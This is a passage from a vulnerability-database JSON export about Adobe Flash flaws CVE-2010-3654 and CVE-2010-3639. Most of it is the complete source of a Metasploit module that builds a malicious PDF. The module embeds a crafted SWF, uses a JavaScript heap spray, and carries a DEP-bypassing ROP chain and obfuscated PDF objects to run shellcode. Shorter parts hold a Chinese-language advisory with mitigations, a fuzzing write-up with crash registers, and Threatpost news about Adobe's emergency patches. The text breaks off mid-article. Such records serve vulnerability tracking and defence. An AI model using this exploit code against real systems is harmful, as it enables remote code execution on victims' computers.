Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player "Button" Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\r\n\t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\r\n\t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. 
This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Found being openly exploited\r\n\t\t\t\t\t'Haifei Li', # PoC\r\n\t\t\t\t\t'jduck' # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10857 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2010-3654'],\r\n\t\t\t\t\t['OSVDB', '68932'],\r\n\t\t\t\t\t['BID', '44504'],\r\n\t\t\t\t\t['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'],\r\n\t\t\t\t\t['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC\r\n\t\t\t\t\t# For SWF->PDF embedding\r\n\t\t\t\t\t['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 28 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tswf_data = make_swf()\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(swf_data, js_data)\r\n\r\n\t\tprint_status("Creating '#{datastore['FILENAME']}' file...")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_swf\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( 
Msf::Config.install_root, "data", "exploits", "CVE-2010-3654.swf" )\r\n\t\tfd = File.open( path, "rb" )\r\n\t\tswf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tswf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xc0c0c0c + 0x10,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - 
VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / 
ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = ""\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t"%d 0 obj\\n" % 
id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t"%d 0 R" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = ""\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << "#%x" % c.unpack("C*")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = ""\r\n\t\twhitespace = ""\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << "%02x" % b\r\n\t\t\twhitespace = " " * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << ">"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + ".swf"\r\n\r\n\t\txref = []\r\n\t\teol = "\\n"\r\n\t\tendobj = "endobj" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = "%PDF-1.5" << eol\r\n\t\t#pdf << "%" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu("<</Type/Catalog")\r\n\t\tpdf << nObfu("/Pages ") << ioRef(3)\r\n\t\tpdf << nObfu("/OpenAction ") << ioRef(5)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu("<</Type/Pages/Count 1/Kids [") << ioRef(4) << nObfu("]>>") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3)\r\n\t\tpdf << nObfu("/Annots [") << ioRef(7) << nObfu("] ")\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf 
<< compressed << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu("<</Type/Annot/Subtype/RichMedia")\r\n\t\tpdf << nObfu("/Rect [20 20 187 69] ")\r\n\t\tpdf << nObfu("/RichMediaSettings ") << ioRef(8)\r\n\t\tpdf << nObfu("/RichMediaContent ") << ioRef(9)\r\n\t\tpdf << nObfu("/NM (") << swf_name << nObfu(")")\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu("<</Type/RichMediaSettings/Subtype/Flash")\r\n\t\tpdf << nObfu("/Activation ") << ioRef(10)\r\n\t\tpdf << nObfu("/Deactivation ") << ioRef(11)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu("<</Type/RichMediaContent")\r\n\t\tpdf << nObfu("/Assets ") << ioRef(12)\r\n\t\tpdf << nObfu("/Configurations [") << ioRef(14) << "]"\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu("<</Type/RichMediaActivation/Condition/PO>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu("<</Type/RichMediaDeactivation/Condition/XD>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu("<</Names [(#{swf_name}) ") << ioRef(13) << nObfu("]>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu("<</Type/Filespec /EF <</F ") << ioRef(16) << nObfu(">> /F(#{swf_name})>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu("<</Type/RichMediaConfiguration/Subtype/Flash")\r\n\t\tpdf << nObfu("/Instances [") << ioRef(15) << 
nObfu("]>>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu("<</Type/RichMediaInstance/Subtype/Flash")\r\n\t\tpdf << nObfu("/Asset ") << ioRef(13)\r\n\t\tpdf << nObfu(">>")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol\r\n\t\tpdf << "stream" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << "endstream" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << "xref" << eol\r\n\t\tpdf << "0 %d" % (xref.length + 1) << eol\r\n\t\tpdf << "0000000000 65535 f" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << "%010d 00000 n" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << "trailer" << eol\r\n\t\tpdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol\r\n\r\n\t\tpdf << "startxref" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << "%%EOF" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-71175", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:47", "description": "BUGTRAQ ID: 44504\r\nCVE ID: CVE-2010-3654\r\n\r\nFlash Player\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684FLASH\u64ad\u653e\u5668\u3002\r\n\r\nFlash Player\u7684authplay.dll\u5e93\u5728\u89e3\u6790\u7578\u5f62PDF\u6587\u4ef6\u65f6\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u7528\u6237\u53d7\u9a97\u6253\u5f00\u4e86\u5185\u5d4c\u6709\u6076\u610fFlash\u5185\u5bb9\u7684PDF\u6587\u4ef6\u65f6\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nAdobe Acrobat 9.4\r\nAdobe Flash Player 10.1.95.2\r\nAdobe Flash Player 10.1.85.3\r\nAdobe Reader 
9.4\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728\u6d4f\u89c8\u5668\u4e2d\u7981\u7528Flash\uff0c\u7981\u6b62\u663e\u793aPDF\u6587\u6863\u3002\r\n\r\n* \u5728Adobe Reader 9\u4e2d\u7981\u7528Flash\u548c3D & Multimedia\u652f\u6301\u3002\r\n\r\n* \u5728Adobe Reader\u548cAcrobat\u4e2d\u7981\u7528JavaScript\u3002\r\n\r\n* \u7981\u6b62Internet Explorer\u81ea\u52a8\u6253\u5f00PDF\u6587\u6863\u3002\r\n\r\n* \u5728Microsoft Windows\u4e2d\u542f\u7528DEP\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.adobe.com", "published": "2010-11-01T00:00:00", "type": "seebug", "title": "Adobe Flash Player authplay.dll\u5e93PDF\u6587\u4ef6\u89e3\u6790\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2010-11-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20218", "id": "SSV:20218", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:17:35", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash ActionIf Integer Denial of Service Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3639"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70138", "id": "SSV:70138", "sourceData": "\n Adobe Flash Integer Overflow \r\nAuthor: Matthew Bergin\r\nDate: June 15, 2010\r\nVersions Affected: Flash10e.ocx v10.0.45.2\r\n\t\t Flash10c.ocx v10.0.32.18 r32\r\nRoot Cause: ActionScript, "ActionIf"\r\nAffect: Denial-of-Service, possible Command Execution\r\nCVE: 
CVE-2010-3639\r\nDesc: When Parsing an ActionIf ActionScript statement four args are passed\r\n to the function, an integer named i , a ubyte named ActionCode, a ushort\r\n named Length, and a short named BranchOffset. If the BranchOffset is -305 or \r\n smaller it will cause an Access Violation when reading data from a \r\n invalid memory address. The last 16-bits of the address are controlable\r\n with the size of the BranchOffset argument. Any data which is in a valid\r\n segment of memory near the controlled address can be read causing Memory\r\n Disclosure. This would be used well in combination with a memory corruption\r\n vulnerability in order to bypass ASLR. \r\n\r\n In doing my initial research I found a lot of interesting things along the way.\r\n Flash10c is not vulnerable in the same way Flash10e is. I initially discovered\r\n the integer overflow in Flash10c while fuzzing SWF. I didnt fuzz it via a web\r\n browser but instead used a free application which uses the modules in a more\r\n direct manner. Flash10c is not able to be attacked via a browser as far as I\r\n have been able to tell. However, I have found during my research that Flash10e\r\n is loaded as a module when any Flash object is encountered. I am unsure as to\r\n if this is a configuration issue or not. In addition to this, while debugging\r\n this issue I found that both versions have a self-changing CRC which inhibits\r\n keeping break points set.\r\n\r\n Another interesting note is that when confirming the PoC on Flash Movie Player\r\n i noticed that if you open the file with the File -> Open drop down menu, the\r\n PoC will not hit the vulnerable code causing a crash. However, if you register\r\n the swf extension to Flash Movie Player and "double-click" the PoC file to run\r\n it, Flash Movie Player will hit the vulnerable code every time. 
\r\n\r\n The PoC code would be best embedded into HTML for remote attacks but can be\r\n attacked in any manner in which Flash10c.ocx/Flash10e.ocx are loaded as modules\r\n into memory.\r\n\r\n\r\nFuzzed Application: EolSoft Flash Movie Player (downloads.cnet.com) v1.5\r\n\r\nCrash Details:\r\n\r\nAccess Violation\r\nException caught at 1009cb23 mov al,[eax+ecx]\r\nEAX:0267010c EBX:00e990b4 ECX:fffffef3 EDX:00e9b038\r\nESI:00e80000 EDI:00e990b0 ESP:0012f780 EBP:0012f99c\r\n\r\nReversing:\r\n\r\nstruct SWFTAG Tag[7], value DoAction\r\nstruct ACTIONRECORD ActionTag[6], value ActionIf, starts @ E3h size 5h\r\nint i, value 0\r\nubyte ActionCode, value 157\r\nushort Length, value 2\r\nshort BranchOffset, value -305\r\n\r\nBranchOffset is located @ E6h-E7h\r\n\r\nPoC: http://www.exploit-db.com/sploits/adobe_flash_int_ovrflw_poc.rar\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70138", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:06:38", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "Adobe on Tuesday released an [emergency patch for several critical vulnerabilities in Adobe Reader](<http://blogs.adobe.com/psirt/2010/11/security-updates-released-for-adobe-reader-and-acrobat-apsb10-28.html>), including the [recent Adobe Flash bug](<https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/>) and a separate flaw that was disclosed earlier this month. \n\nThe patch released Tuesday is outside of the company\u2019s normal quarterly update schedule for Reader and was released early because of ongoing attacks against some of the vulnerabilities being fixed. The Flash vulnerability was disclosed two weeks ago and Adobe pushed out a patch for Flash quickly. 
The Reader version of the vulnerability took a while longer to fix.\n\n\u201cA \n[critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability has been identified\n\nin Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, \nLinux and Solaris; Adobe Flash Player 10.1.95.2 and earlier versions for \nAndroid; and the authplay.dll component that ships with Adobe Reader \n9.4 and earlier 9.x versions for Windows, Macintosh and UNIX, and Adobe \nAcrobat 9.4 and earlier 9.x versions for Windows \nand Macintosh. This vulnerability (CVE-2010-3654) could cause a crash \nand potentially allow an attacker to take control of the affected \nsystem,\u201d Adobe said in its advisory on the bug.\n\nOne of the other issues that Adobe fixed in Reader is a bug that can be used to cause a crash or denial of service. There are some reports that the flaw also can be used to execute remote code, although Adobe did not confirm that.\n", "modified": "2013-04-17T16:35:41", "published": "2010-11-16T19:41:53", "id": "THREATPOST:DAFE4C40F672DA84E11AC6FFC2BBB716", "href": "https://threatpost.com/adobe-releases-emergency-fix-critical-reader-flaws-111610/74678/", "type": "threatpost", "title": "Adobe Releases Emergency Fix for Critical Reader Flaws", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:44", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "[](<https://threatpost.com/adobe-accelerates-patch-schedule-critical-flash-bug-110210/>)Adobe has moved up the release date for the patch for the [critical bug in Adobe Flash Player](<https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/>) revealed last week, and now plans to have a fix ready on Thursday. 
The company still plans to patch Reader two weeks from now.\n\nThe vulnerability in Flash also exists in Reader and researchers said last week that attackers had already begun exploiting the bug in Reader by the time that Adobe acknowledged the problem and published an advisory. At the time of the initial advisory, Adobe officials said they planned to release a patch for Flash on Nov. 9 and for Reader on Nov. 15. \n\nOn Tuesday, the company updated its guidance, saying that the patch for Flash on Windows, Mac, Linux and Solaris will be pushed out on Thursday, Nov. 4, and that the fix for Flash on Android will still be published Nov. 9. The schedule for the Reader patch remains the same.\n\nA security researcher identified the Flash bug last Thursday and published a short explanation of it, which Adobe confirmed later in the day.\n\n\u201cA \n[critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability has been identified\n\nin Flash Player 10.1.85.3 and earlier versions for Windows, Macintosh, \nLinux and Solaris; Adobe Flash Player 10.1.95.2 and earlier versions for \nAndroid; and the authplay.dll component that ships with Adobe Reader \n9.4 and earlier 9.x versions for Windows, Macintosh and UNIX, and Adobe \nAcrobat 9.4 and earlier 9.x versions for Windows \nand Macintosh. This vulnerability (CVE-2010-3654) could cause a crash \nand potentially allow an attacker to take control of the affected \nsystem,\u201d Adobe said.\n\nThere were reports on Wednesday that another unpatched bug in Adobe\u2019s Shockwave software had been found, as well. Secunia posted an advisory saying that there\u2019s a [new use-after-free bug in Shockwave](<http://secunia.com/advisories/42112>) that can be exploited in certain Web-based attack scenarios. 
\n\n\u201cThe vulnerability is caused due to a use-after-free error in an \nautomatically installed compatibility component as a function in an \nunloaded library may be called,\u201d the Secunia advisory said. \u201cSuccessful exploitation allows execution of arbitrary code, but requires \nthat a user is tricked into opening the \u201cShockwave Settings\u201d window \nwhen viewing a web page.\u201d\n\nAdobe patched a previous vulnerability in Shockwave last week.\n", "modified": "2018-08-15T10:16:26", "published": "2010-11-02T19:15:03", "id": "THREATPOST:731A5A35EAC80BFED9629C1E359C6390", "href": "https://threatpost.com/adobe-accelerates-patch-schedule-critical-flash-bug-110210/74632/", "type": "threatpost", "title": "Adobe Accelerates Patch Schedule for Critical Flash Bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "bulletinFamily": "info", "cvelist": ["CVE-2010-3654"], "description": "[](<https://threatpost.com/new-adobe-flash-bug-being-exploited-102810/>)On the same day that it plans to release a [patch for a critical flaw in Shockwave](<http://blogs.adobe.com/psirt/2010/10/security-advisory-for-adobe-shockwave-player-apsa10-04.html>), Adobe confirmed on Thursday morning that there is a newly discovered bug in Flash that is being actively exploited already in attacks against Reader. The vulnerability affects Flash on all of the relevant 